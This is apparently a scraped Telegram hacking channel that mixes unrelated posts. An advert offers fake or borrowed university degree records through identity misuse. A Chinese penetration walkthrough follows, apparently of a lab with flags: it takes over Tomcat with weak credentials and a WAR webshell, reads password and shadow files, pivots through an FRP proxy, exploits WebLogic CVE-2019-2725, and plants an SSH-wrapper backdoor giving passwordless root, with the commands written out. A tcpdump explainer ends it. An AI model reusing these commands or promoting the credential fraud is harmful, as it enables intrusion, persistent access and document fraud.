黑客技术渗透拿站 数据劫持
2.85K subscribers
423 photos
15 links
Download Telegram
学信网学历认证的方式快速办理的只有两种
第一种是套号,套取同名同姓人的学历,套号简单说就是找你同名同姓同出生年月的人,学信网可查,用他的学历学位找工作,适合求职学信网可查。
以下不适合使用范围
1.不能考公,考编
2.国企央企不行,事业单位政府
3.现场查学籍
4.(照片身份证号码都不是你的)
第二种就是挂网我们有专业的渠道可以办理挂学信网的学历需要提供需要的(学校 专业 毕业时间 蓝底照片) 学信网可查,反之照片身份证号码都是你的收费比套号要昂贵
其他学历认证包括学校这一块留学服务我们也是提供的。
Tomcat漏洞利用
直接使用弱口令tomcat:tomcat进入后台,也可以尝试暴力破解,往下拉,找到Tomcat项目部署功能,此功能允许用户通过上传war包,来部署自己的应用项目
利用蚁剑的jsp木马,制作生成包含jsp木马的ant.war包:利用管理后台上传部署war包的功能,上传部署制作的含有恶意木马的ant.war包

war包部署后会在Tomcat的WEB根目录创建解压生成一个ant文件夹,war包中的恶意

木马ant.jsp在ant文件夹下
Getshell,查看当前主机所在内网IP段,及当前主机,所运行的服务信息,查看所有用户信息,可能存在因配置不当导致的特权用户及用户的密码信息等
cat /etc/passwd
cat /etc/shadow
查看存放在系统内的敏感文件,如包含用户密码、服务访问密码等敏感信息的文件
find / -name *pass* -type f
find / -name *admin* -type f
查看flag,可以发现前四个flag
grep -r "flag*"
内网渗透
第一层内网
信息收集
上传工具,使用ladon64工具扫描探测172.22.0.0/24网段,判断内网存活主机IP
cd /tmp
chmod +x ladon64
./ladon64 172.22.0.0/24 icmpscan
得到内网网段存活主机IP:172.22.0.20
发现内网网段存活主机172.22.0.22开放了7001端口,服务为weblogic,版本号为10.3.6.0
FRP建立Socks5代理
通过蚁剑的文件管理功能,上传相关工具文件到tomcat服务器的/tmp目录
Tomcat修改frpc配置文件
Weblogic漏洞利用
这里他是vnc连接,没办法上传一把梭工具,只能利用里面给的工具。

通过WeblogicScan.py发现目标存在CVE-2019-2725漏洞

目标存在CVE-2019-2725漏洞

执行成功

weblogic-CVE-2019-2725.py传马默认用的get请求,所以蚁剑连不上

但是Tomcat和Weblogic服务器在同一个网段,可以互相访问,在Weblogic服务器上可以通过如下URL访问ant.txt文件

打开一个新的蚁剑窗口并配置socks5代理,找到 AntSword > 代理设置 > 手动设置代理 > 选择socks5代理协议 > 填写代理服务器IP > 填写代理服务端口 > 保存。注意,保存时会提示重启中国蚁剑。
权限维持
权限持久化(后门)
为了能够持续的对目标进行控制,我们可以通过在目标机器上留下一个后门,方便我们下次继续控制目标,并得到root权限。
利用SSH Server Wrapper技术,在dev服务器留下SSH登录后门,
cd /usr/sbin/
mv sshd ../bin
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..LF/);' >>sshd
echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
可无需密码获得目标主机root用户权限:

echo "ls" | socat STDIO TCP4:172.26.0.30:22,sourceport=19526
echo "whoami" | socat STDIO TCP4:172.26.0.30:22,sourceport=19526
echo "ip addr" | socat STDIO TCP4:172.26.0.30:22,sourceport=19526
这里因为中国蚁剑的模拟终端会自动的把进程放到后台,因此,无法直接在终端中与我们留下的后门进行命令交互,这里采用管道|的方法,把要执行的命令重定向到与后门的连接中,并返回执行后的
注意:因为每执行一次命令需要连接我们的后门,然后执行命令,返回结果,因此在执行下个命令时,需要稍微等待几秒时间,等待上次连接关闭,然后才能继续执行命令,否则会出现如图所示错误:Address already in use。
什么是 tcpdump?
tcpdump 是一个命令行数据包分析器,可让您捕获和显示通过网络传输的数据包。

tcpdump 是由劳伦斯伯克利国家实验室的 Van Jacobson、Craig Leres 和 Steven McCanne 于 20 世纪 80 年代末创建的。它是一款适用于 Linux、FreeBSD、OpenBSD 和 macOS 等基于 Unix 的操作系统的开源工具,也可以通过 WinDump 等端口在 Windows 上使用。

什么是 Wireshark?
Wireshark 是一个基于 GUI 的数据包分析器。它为捕获和分析网络流量提供了更加用户友好的界面。
tcpdump 的作用是什么
tcpdump 用于捕获网络数据包。数据包是通过网络发送的一小段数据。tcpdump 从网络接口捕获并显示这些数据包,让您查看传输的数据。

Tcpdump 通过命令行界面 (CLI) 工作,这意味着您可以通过在终端中输入命令来与其交互。CLI 允许更强大和更灵活的使用,特别是如果您习惯使用终端。

它还很轻量,适合资源有限或 GUI 不实用的环境。

tcpdump 的主要功能之一是其过滤数据包的能力。使用Berkeley Packet Filter 语法,您可以应用过滤器来捕获特定类型的流量,例如来自特定 IP 地址的数据包或使用特定协议的数据包。